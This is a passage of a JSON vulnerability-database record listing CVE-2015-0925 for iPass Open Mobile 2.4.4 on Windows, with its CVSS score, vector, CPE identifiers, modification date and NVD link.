"authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0925"], "modified": "2015-01-24T02:26:00", "cpe": ["cpe:/a:ipass:ipass_open_mobile:2.4.4"], "id": "CVE-2015-0925", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0925", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:ipass:ipass_open_mobile:2.4.4:*:*:*:*:windows:*:*"]}]}
